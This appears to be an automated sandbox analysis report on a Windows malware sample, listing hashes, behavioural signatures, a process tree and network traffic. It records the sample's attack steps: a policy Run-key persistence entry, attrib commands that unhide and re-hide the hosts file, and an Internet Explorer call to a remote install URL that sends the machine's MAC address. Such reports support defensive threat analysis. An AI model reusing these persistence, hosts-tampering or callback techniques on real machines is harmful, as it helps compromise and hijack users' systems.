Analysis
-
max time kernel
44s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
05-01-2024 03:51
Static task
static1
Behavioral task
behavioral1
Sample
42aea7e72270c79f9f577b979828bc0d.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
42aea7e72270c79f9f577b979828bc0d.exe
Resource
win10v2004-20231222-en
General
-
Target
42aea7e72270c79f9f577b979828bc0d.exe
-
Size
47KB
-
MD5
42aea7e72270c79f9f577b979828bc0d
-
SHA1
8fa941a906a756b11e000db02cb3d06a4a51f976
-
SHA256
b5ae6d2c48d06d0764e04b5c8e57dff529aa74bf57f10b652a4b040fe8d30ad7
-
SHA512
61d8cf5ca3b7fc570718fdad605aba5940a62b138bbbf17088f35236d7de7a4d216eee05928ed72d565b904865cbaaca44888000d57e3db70c8aae682d173702
-
SSDEEP
768:o6QZ/MVvp3w/qUfsRd9Zsb5CDsaSur5dikXB5ZCgcFEaW6FqTwPhrvSQ1KIsmY:s/MVvp3w/hcG5esaSur5A6ZCgRbVTkA5
Malware Config
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run 42aea7e72270c79f9f577b979828bc0d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\42aea7e72270c79f9f577b979828bc0d.exe" 42aea7e72270c79f9f577b979828bc0d.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 42aea7e72270c79f9f577b979828bc0d.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5024 attrib.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3592 42aea7e72270c79f9f577b979828bc0d.exe 3592 42aea7e72270c79f9f577b979828bc0d.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4952 iexplore.exe 4952 iexplore.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3592 wrote to memory of 2820 3592 42aea7e72270c79f9f577b979828bc0d.exe 47 PID 3592 wrote to memory of 2820 3592 42aea7e72270c79f9f577b979828bc0d.exe 47 PID 3592 wrote to memory of 2820 3592 42aea7e72270c79f9f577b979828bc0d.exe 47 PID 3592 wrote to memory of 5024 3592 42aea7e72270c79f9f577b979828bc0d.exe 91 PID 3592 wrote to memory of 5024 3592 42aea7e72270c79f9f577b979828bc0d.exe 91 PID 3592 wrote to memory of 5024 3592 42aea7e72270c79f9f577b979828bc0d.exe 91 PID 3592 wrote to memory of 4952 3592 42aea7e72270c79f9f577b979828bc0d.exe 105 PID 3592 wrote to memory of 4952 3592 42aea7e72270c79f9f577b979828bc0d.exe 105 PID 4952 wrote to memory of 3876 4952 iexplore.exe 106 PID 4952 wrote to memory of 3876 4952 iexplore.exe 106 PID 4952 wrote to memory of 3876 4952 iexplore.exe 106 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2820 attrib.exe 5024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe"C:\Users\Admin\AppData\Local\Temp\42aea7e72270c79f9f577b979828bc0d.exe"1⤵
- Adds policy Run key to start application
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Windows\system32\drivers\etc\hosts"2⤵
- Views/modifies file attributes
PID:2820
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\system32\drivers\etc\hosts"2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5024
-
-
C:\program files\internet explorer\iexplore.exe"C:\program files\internet explorer\iexplore.exe" "http://www.2009ylm.cn/union/install.asp?ver=090107&tgid=p222&address=FE-6B-1C-63-FC-C4®k=1&flag=49b94138570212aa317e658a0d60d8c6&frandom=9969"2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4952 CREDAT:17410 /prefetch:23⤵PID:3876
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c 0x4a01⤵PID:1440
Network
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.a-0001.a-msedge.netg-bing-com.a-0001.a-msedge.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8CBF64E5B7D14CF38A828013491E2CCA Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
date: Fri, 05 Jan 2024 03:51:36 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk; domain=.bing.com; expires=Wed, 29-Jan-2025 03:51:37 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F69A40A4FF924529947CB2BF47B4D76E Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
date: Fri, 05 Jan 2024 03:51:36 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3014C7E2D03F6EA92C23D41FD1846F9A; MSPTC=Wzg-aWUjNjKe5jzK9VH2knlpmU6ZFxSMC2_LIUdulGk
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7BAF3360C5964F62B37AA24CEF906992 Ref B: LON04EDGE0810 Ref C: 2024-01-05T03:51:37Z
date: Fri, 05 Jan 2024 03:51:37 GMT
-
Remote address:8.8.8.8:53Request208.194.73.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request208.194.73.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request173.178.17.96.in-addr.arpaIN PTRResponse173.178.17.96.in-addr.arpaIN PTRa96-17-178-173deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request173.178.17.96.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.177.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request158.240.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request41.110.16.96.in-addr.arpaIN PTRResponse41.110.16.96.in-addr.arpaIN PTRa96-16-110-41deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
204.79.197.200:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=tls, http22.2kB 9.9kB 23 17
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8ee06e6e39234f0fbe13aa8ee64564d2&localId=w:8DF2633F-10BE-C247-8B12-9A64CE5AE8FE&deviceId=6896190589629886&anid=HTTP Response
204 -
5.2kB 1.4kB 7 5
-
-
-
-
-
-
-
2.5kB 27.4kB 49 48
-
46 B 1
-
46 B 1
-
1.6kB 8.3kB 17 14
-
1.6kB 8.3kB 17 14
-
37.7kB 973.7kB 717 713
-
803 B 152 B 6 3
-
1.2kB 589 B 11 8
-
56 B 158 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.20013.107.21.200
-
144 B 158 B 2 1
DNS Request
208.194.73.20.in-addr.arpa
DNS Request
208.194.73.20.in-addr.arpa
-
144 B 137 B 2 1
DNS Request
173.178.17.96.in-addr.arpa
DNS Request
173.178.17.96.in-addr.arpa
-
146 B 106 B 2 1
DNS Request
200.197.79.204.in-addr.arpa
DNS Request
200.197.79.204.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.177.190.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
158.240.127.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
0.159.190.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
41.110.16.96.in-addr.arpa
-
-
-
-
-
-
-
-
-
-
-
62 B 173 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.20013.107.21.200
-